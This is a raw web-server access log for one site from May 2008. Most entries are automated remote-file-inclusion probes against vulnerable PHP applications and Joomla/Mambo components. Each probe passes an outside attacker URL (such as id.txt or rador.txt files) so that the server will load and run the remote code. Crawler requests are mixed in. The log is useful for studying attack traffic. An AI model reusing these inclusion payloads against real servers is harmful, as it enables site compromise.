83.19.144.26 - - [03/May/2008:10:28:29 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:10:28:29 -0700] "GET /logs//interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:10:28:30 -0700] "GET //interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:32 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:28:32 -0700] "GET /logs/access_080218.log/convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:43 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:45 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:46 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:28:51 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:54 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:06 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:07 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:10:29:12 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:10:29:13 -0700] "GET //auto_check_renewals.php?installed_config_file=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:28 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:30 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:32 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:10:29:32 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:10:29:32 -0700] "GET //auto_check_renewals.php?installed_config_file=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:33 -0700] "GET /logs/access_080324.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.248.101.69 - - [03/May/2008:10:29:33 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:34 -0700] "GET /logs/access_080324.log//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:35 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:36 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:38 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:29:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.248.101.69 - - [03/May/2008:10:29:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:29:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.189 - - [03/May/2008:10:29:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.101 - - [03/May/2008:10:29:46 -0700] "GET /tmp/ HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.75.62.12 - - [03/May/2008:10:29:51 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.75.62.12 - - [03/May/2008:10:29:51 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.75.62.12 - - [03/May/2008:10:29:51 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:57 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:58 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:29:59 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:01 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:02 -0700] "GET /logs/access_080324.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:02 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:02 -0700] "GET /logs/access_080324.log//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:03 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:08 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:30:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:30:15 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.40 - - [03/May/2008:10:30:15 -0700] "GET /logs/?N=D HTTP/1.1" 200 45840 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:10:30:39 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:10:30:39 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:31:10 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.31.61.43 - - [03/May/2008:10:31:24 -0700] "GET /lib/gore.php?libpath=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:32:28 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:32:29 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:32:31 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:33:05 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:33:22 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:33:38 -0700] "GET /logs//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:33:39 -0700] "GET //atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:33:42 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:33:46 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:33:47 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:33:56 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:34:05 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:10:34:40 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:10:34:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:10:34:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:34:49 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:34:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
203.130.242.135 - - [03/May/2008:10:35:12 -0700] "GET /logs/templates/mangobery/footer.sample.php=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [03/May/2008:10:35:13 -0700] "GET /templates/mangobery/footer.sample.php=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:35:16 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.52.57 - - [03/May/2008:10:36:11 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 7172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
193.51.215.1 - - [03/May/2008:10:36:50 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.0" 200 11590 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:37:00 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:37:01 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:37:30 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.75.62.12 - - [03/May/2008:10:37:35 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:10:37:40 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.7.220 - - [03/May/2008:10:37:57 -0700] "GET /logs/access.log HTTP/1.0" 200 241217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:38:07 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:38:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:38:07 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:38:37 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:38:38 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:38:40 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:38:41 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:10:39:26 -0700] "GET /logs/access_071225.log//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:10:39:27 -0700] "GET //includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:10:39:27 -0700] "GET /logs//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.120.27.17 - - [03/May/2008:10:39:29 -0700] "GET /logs/access_071225.log//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [03/May/2008:10:39:30 -0700] "GET //includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [03/May/2008:10:39:30 -0700] "GET /logs//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:39:34 -0700] "GET /logs//home.php?pagina=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:39:35 -0700] "GET //home.php?pagina=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.52.95 - - [03/May/2008:10:39:44 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 7172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
193.51.215.1 - - [03/May/2008:10:39:44 -0700] "GET /logs//home.php?pagina=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:39:46 -0700] "GET //home.php?pagina=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:10:39:55 -0700] "GET /logs//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:10:39:55 -0700] "GET //includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:39:58 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:39:58 -0700] "GET //ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
140.113.4.81 - - [03/May/2008:10:40:41 -0700] "GET /logs/access_071226.log//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.36.144.8 - - [03/May/2008:10:40:42 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "dmulk.com"
140.120.27.17 - - [03/May/2008:10:40:56 -0700] "GET /logs//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [03/May/2008:10:40:57 -0700] "GET //includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [03/May/2008:10:41:10 -0700] "GET /logs/access_071226.log//includes/common.php?module_root_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:41:21 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:42:11 -0700] "GET /modifyform.html?code=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.229.199.197 - - [03/May/2008:10:42:59 -0700] "GET /logs/index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
200.229.199.197 - - [03/May/2008:10:43:03 -0700] "GET /index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:43:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:43:14 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:43:30 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:43:37 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.1.215.164 - - [03/May/2008:10:43:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.dmulk.com"
212.227.127.11 - - [03/May/2008:10:44:38 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.11 - - [03/May/2008:10:44:42 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.11 - - [03/May/2008:10:44:42 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
